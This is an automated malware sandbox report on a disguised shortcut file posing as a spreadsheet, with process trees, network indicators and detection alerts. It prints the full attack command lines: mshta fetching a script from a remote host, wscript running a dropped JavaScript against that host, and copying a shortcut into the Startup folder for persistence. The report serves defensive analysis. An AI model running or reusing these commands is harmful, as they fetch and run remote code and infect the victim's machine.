Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 23, 2021, 10:21 a.m.	Oct. 23, 2021, 10:25 a.m.

Size	22.3KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=24, Archive, ctime=Sun Feb 16 21:46:36 2020, mtime=Mon Sep 28 16:46:47 2020, atime=Sun Feb 16 21:46:36 2020, length=280064, window=hide
MD5	`a0c1ca01548be7690f2976742f068e67`
SHA256	`9d6fdb5344f64e059043980c5bb80e9c8986f1a5a62d7d7871144b388df65262`
CRC32	`2B249EFB`
ssdeep	`192:8xB4MFv6PaJwa7Hs+KmIUBfIJL2V++lNhJ8xObpGUyeaHu8LmCKminVN4arzIIWb:IjyPaTskgAc+HD1bpBypusKIQstlX6G`
Yara	Generic_Malware_Zero - Generic Malware Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "rBJLfVPM" "C:\Users\test22\AppData\Local\Temp\Profit and Loss Statement.xlsx.lnk"
2476
- cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=
  204
  - mshta.exe C:\Windows\System32\mshta https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=
    2128
    - explorer.exe "C:\Windows\System32\explorer.exe" "https://docs.google.com/spreadsheets/d/1CTWarBPpx6kQjpevxr7qeQGPenjAR_7H/edit?usp=sharing&ouid=118006626630144401406&rtpof=true&sd=true"
      2692
    - cmd.exe "C:\Windows\System32\cmd.exe" /c start /b wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 1 & start /b wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 2 & move "C:\Users\test22\AppData\Local\Temp\UserAssist.lnk" "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
      2596
      - wscript.exe wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 1
        2812
      - wscript.exe wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 2
        548
explorer.exe C:\Windows\Explorer.EXE
1924

Name	Response	Post-Analysis Lookup
share.stablemarket.org	A 149.28.162.113	149.28.162.113
support.google.com	A 142.250.204.46	216.58.197.238
www.google-analytics.com	CNAME www-google-analytics.l.google.com A 142.250.204.110	142.250.207.46
fonts.gstatic.com	A 142.250.66.99 CNAME gstaticadssl.l.google.com	142.251.42.131
docs.google.com	A 142.250.66.46	142.251.42.142
apps.identrust.com	A 61.111.58.35 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 61.111.58.34	23.59.72.9
fonts.googleapis.com	A 142.250.66.138	142.251.42.170

IP Address	Status	Action
117.18.232.200	Active	Moloch
142.250.204.110	Active	Moloch
142.250.204.46	Active	Moloch
142.250.66.138	Active	Moloch
142.250.66.46	Active	Moloch
142.250.66.99	Active	Moloch
149.28.162.113	Active	Moloch
164.124.101.2	Active	Moloch
61.111.58.35	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49176 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49184 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49188 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49194 -> 142.250.66.46:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.103:49191	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49201 -> 142.250.204.46:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49203 -> 142.250.204.110:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.103:49193	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49208 -> 142.250.66.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49223 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49206 -> 142.250.66.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49220 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49210 -> 142.250.66.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49202 -> 142.250.66.138:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49186 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49187 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49189 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49190 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49207 -> 142.250.66.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49217 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49211 -> 142.250.66.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49219 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49216 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49222 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49226 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49229 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49225 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49195 -> 142.250.66.46:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49227 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49200 -> 142.250.204.46:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49228 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49204 -> 142.250.66.138:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49209 -> 142.250.66.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49230 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49176 149.28.162.113:443	None	None	None
TLSv1 192.168.56.103:49184 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49194 142.250.66.46:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	34:f2:1e:53:07:94:5c:7d:ef:2c:d7:21:4d:3a:d2:8d:02:03:60:bf
TLSv1 192.168.56.103:49188 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49201 142.250.204.46:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	34:f2:1e:53:07:94:5c:7d:ef:2c:d7:21:4d:3a:d2:8d:02:03:60:bf
TLSv1 192.168.56.103:49203 142.250.204.110:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google-analytics.com	ad:1f:ae:67:67:34:63:1c:e5:ac:37:c2:88:8a:92:34:8c:6b:a3:b0
TLSv1 192.168.56.103:49171 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49208 142.250.66.99:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	b7:c0:7e:9a:54:ca:6d:c1:4a:4e:c0:7f:ea:f0:df:2d:86:10:a8:9a
TLSv1 192.168.56.103:49223 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49206 142.250.66.99:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	b7:c0:7e:9a:54:ca:6d:c1:4a:4e:c0:7f:ea:f0:df:2d:86:10:a8:9a
TLSv1 192.168.56.103:49220 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49202 142.250.66.138:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	c5:11:f7:e2:30:7f:3e:fd:a5:5e:98:6c:9f:37:86:55:2f:83:6e:f4
TLSv1 192.168.56.103:49210 142.250.66.99:443	None	None	None
TLSv1 192.168.56.103:49207 142.250.66.99:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	b7:c0:7e:9a:54:ca:6d:c1:4a:4e:c0:7f:ea:f0:df:2d:86:10:a8:9a
TLSv1 192.168.56.103:49217 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49219 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49211 142.250.66.99:443	None	None	None
TLSv1 192.168.56.103:49216 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49222 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49226 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49229 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49225 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49195 142.250.66.46:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	34:f2:1e:53:07:94:5c:7d:ef:2c:d7:21:4d:3a:d2:8d:02:03:60:bf
TLSv1 192.168.56.103:49227 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49200 142.250.204.46:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	34:f2:1e:53:07:94:5c:7d:ef:2c:d7:21:4d:3a:d2:8d:02:03:60:bf
TLSv1 192.168.56.103:49228 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95
TLSv1 192.168.56.103:49204 142.250.66.138:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	c5:11:f7:e2:30:7f:3e:fd:a5:5e:98:6c:9f:37:86:55:2f:83:6e:f4
TLSv1 192.168.56.103:49209 142.250.66.99:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	b7:c0:7e:9a:54:ca:6d:c1:4a:4e:c0:7f:ea:f0:df:2d:86:10:a8:9a
TLSv1 192.168.56.103:49230 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=stablemarket.org	2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 23, 2021, 10:21 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 23, 2021, 10:21 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Oct. 23, 2021, 10:21 a.m.	buffer: 1 file(s) moved. console_handle: 0x00000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 23, 2021, 10:21 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST https://share.stablemarket.org/

Performs some HTTP requests (14 events)

request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=
request	GET https://docs.google.com/spreadsheets/d/1CTWarBPpx6kQjpevxr7qeQGPenjAR_7H/edit?usp=sharing&ouid=118006626630144401406&rtpof=true&sd=true
request	POST https://share.stablemarket.org/
request	GET https://support.google.com/drive/answer/6283888
request	GET https://fonts.googleapis.com/css2?family=Google+Sans+Text:wght@400;500;700
request	GET https://www.google-analytics.com/analytics.js
request	GET https://fonts.gstatic.com/s/googlesanstext/v16/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTrmw.woff
request	GET https://fonts.gstatic.com/s/googlesanstext/v16/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVrmw.woff
request	GET https://fonts.gstatic.com/s/googlesanstext/v16/5aUu9-KzpRiLCAt4Unrc-xIKmCU5mE4.woff
request	GET https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff
request	GET https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc-.woff
request	GET https://support.google.com/favicon.ico

Sends data using the HTTP POST Method (1 event)

request

POST https://share.stablemarket.org/

Allocates read-write-execute memory (usually to unpack itself) (8 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 23, 2021, 10:21 a.m.	process_identifier: 2128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04510000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 23, 2021, 10:21 a.m.	process_identifier: 2128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04510000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 23, 2021, 10:21 a.m.	process_identifier: 2128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04511000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 23, 2021, 10:21 a.m.	process_identifier: 2128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04511000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 23, 2021, 10:21 a.m.	process_identifier: 2128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04511000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 23, 2021, 10:21 a.m.	process_identifier: 2128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04512000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 23, 2021, 10:21 a.m.	process_identifier: 2128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04513000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 23, 2021, 10:21 a.m.	process_identifier: 2128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04514000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

wscript.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds

Downloads a file or document from Google Drive (1 event)

domain

docs.google.com

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\UserAssist.lnk
file	C:\Users\test22\AppData\Local\Temp\pdgx.js

Creates a shortcut to an executable file (3 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UserAssist.lnk
file	C:\Users\test22\AppData\Local\Temp\UserAssist.lnk
file	C:\Users\test22\AppData\Local\Temp\Profit and Loss Statement.xlsx.lnk

Creates a suspicious process (3 events)

cmdline	C:\Windows\System32\mshta https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=
cmdline	"C:\Windows\System32\cmd.exe" /c start /b wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 1 & start /b wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 2 & move "C:\Users\test22\AppData\Local\Temp\UserAssist.lnk" "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
cmdline	"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 23, 2021, 10:21 a.m.	show_type: 0 filepath_r: cmd parameters: /c start /b wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 1 & start /b wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 2 & move "C:\Users\test22\AppData\Local\Temp\UserAssist.lnk" "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" filepath: cmd	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 23, 2021, 10:21 a.m.	process_identifier: 2128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x04510000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 23, 2021, 10:21 a.m.	flags: 15 family: 0		111	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=

Yara rule detected in process memory (50 out of 99 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Steal credential	rule	local_credential_Steal
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Steal credential	rule	local_credential_Steal
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP

Communicates with host for which no DNS query was performed (1 event)

host

117.18.232.200

Wscript.exe initiated network communications indicative of a script based payload download (50 out of 83 events)

Time & API	Arguments	Status	Return	Repeated
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: yuasd" 7EõJ\KÝwm`³xûR=#{M/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 596		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: FBA1iÞï«ÿ1aa$&xF ñÊ{Òc ÜiE¢Dä§2jU´éy82ò8íLæ/Ò«{´0ïèyTÈÐM9ô7PmÚÃ¶.4û> µêãX$ñC{N#lAè¶í socket: 596		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: ÄÖzAëÐäØG²ÂÚbi?Y+ÕùäJoÚÏçô;)Ý\|BoP0'ûrìwOªÔø^Ý®ã11j1îÓèà¿HÌ}ÐQÝ_È$s»{{Às%cí~sU'3~E÷§íÊAÙkZÔùäJ-:#$W at6Ò ^E÷tã%åÃØ(«¼íÆ#~0àê¼PÒÚÔÄ3²TqfÅ³èÑ²F©y[jË¬4E½M-j4 ªüµûyZryº é}§GN¼4sûyÚWÁ$¹(ÀÂ\|jubnðizwÓÞ=0^í=\Ê¥>Ô6y socket: 596		0	0
WSASend Oct. 23, 2021, 10:21 a.m.	buffer: P0¦#eM"-þ:W1mºÃ¤'Ow« socket: 596		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: $õË'sû¶Jèwa¶Xó±F÷òÿí%áUÛcx6Æ socket: 596		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: yuasd3â>à% NMÞ#iôãp2â Øá¡ÿ/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 1124		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: FBA"&Ãq`Ì8Uáu£f¡Ç3ÕQïûeñfwáabV·/útõQpÒÇSßÓ¸?wGoÔÓ0u[5è=õüë§&M»±°µx\|¯ïßóòÕ?zî¢ãJJû¶î)\|åwg socket: 1124		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: /ZLK;ÍÀ[îØ§ÝrU¼eçÛê;ëH\|´à\|p nÍG F0&dDC/yzNý°Úýr\øÙ«qZÍ2 6èÓp<vèãïmñ; ¢°ìôÖµ3º}û:#ÁBÖ T°9Ùw¼Ám èDqoL7vçæ,®+ö¾ýyÛA"3.^yÝl¦wÖÔjt¬ø'»öyãdEêS¬$ÅóNüâß¸GDÄixG=I.nù¹®Wyº¯â[[dGgýû:`Ð®ëoøð<º¨áÅÅ½í~Ñ¢iº ÷ ¿½\|ý¨ÇÈ]tÁDÉ socket: 1124		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: Ó´À8-T\æãBþçb²¯ìíÅäÁà`[D socket: 1124		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: %ÐbNnwTÍ·D!^¥Áàk ÀCXBÛBk%$ socket: 1124		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: yuasdCÌC²¿¿-G$ ¤¾c(:Ìbò'ødÕù²O£/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 420		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: FBAbÂ´¬Ì§×$ ¤nzzûx%èXÐëøW?åQxGªâ×ê~ã4å(fd³4êNn¯J%_§YT0ÏÓ¹n[gõ,ã¯úÖô/ =3÷;´Mx$%ÛZP÷Â7<o$Vç» socket: 420		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1160		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: ¢µÀ4¤K¨è¹]óÙ.2§?4á2N¯ãÅ²wS#ýKÍ5§7}à@§ä GKuD¥Ï-DVå¼¡äo1x8[?kkÎf§åÕ¹eÒéuOn ±Í¿´Z&+ ÃEzejª}1ÔEAu]>ÌêMÃ¬ûû!.ªnLoVêmN£N^ _ê4 Ö¡ìþµÆÙ)ðÃ¹6çxI7ßcj.Äñâj²cÒ&C¾µI+ã¸»Ë1U´nQPß%=&PsàÒ++$}ùqgó$XWÏÎÐ¨Gµ¼ö00¬yç<¥6^¹4]q Ô,}¿»ÃuWC socket: 420		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: HÜÞHÊåö§÷ApjM{këYÔ·:ãÕÜqe· socket: 420		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: ¨¹¸óo@ÿh?Úþ"E©ãðõñ¿ÜÏ socket: 420		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: yuasdSûcT©'A¯µB~:ëþADÁ2Az\|.2ò/5 ÀÀÀ À 284ÿshare.stablemarket.org socket: 404		0	0
WSASend Oct. 23, 2021, 10:22 a.m.	buffer: FBAÍ\SK¡=b´} ùûÅ=èåÿ4¥ÖmÒzÉ»¥]ouä æ]MæZqymIüð*îÐý02M½CôXþo£B-³¦ S©:íú~ËF\|&È°ÑKOñNtbKE socket: 404		0	0
